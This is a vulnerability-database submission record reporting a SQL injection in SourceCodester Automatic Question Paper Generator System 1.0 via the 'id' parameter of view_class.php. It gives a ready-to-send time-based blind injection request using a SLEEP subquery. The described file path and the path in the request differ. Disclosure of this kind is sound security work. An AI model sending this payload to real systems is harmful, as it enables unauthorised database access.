| Название | SourceCodester Automatic Question Paper Generator System GET Parameter view_class.php SQL Injection |
|---|
| Описание | A SQL Injection vulnerability was found in SourceCodester Automatic Question Paper Generator System 1.0. The vulnerable file is admin/courses/view_class.php and the injectable parameter is id.
A time-based blind injection poc is:
GET /aqpg/users/classes/view_class.php?id=1' AND (SELECT 7504 FROM (SELECT(SLEEP(5)))lKSD) AND 'svPe'='svPe&_=16795545049481&_=1679554504948 HTTP/1.1 |
|---|
| Источник | ⚠️ https://www.sourcecodester.com/php/15190/automatic-question-paper-generator-system-phpoop-free-source-code.html |
|---|
| Пользователь | WWesleywww (UID 43117) |
|---|
| Представление | 23.03.2023 08:00 (3 лет назад) |
|---|
| Модерация | 23.03.2023 09:42 (2 hours later) |
|---|
| Статус | принято |
|---|
| Запись VulDB | 223660 [SourceCodester Automatic Question Paper Generator System 1.0 GET Parameter view_class.php ИД SQL-инъекция] |
|---|
| Баллы | 20 |
|---|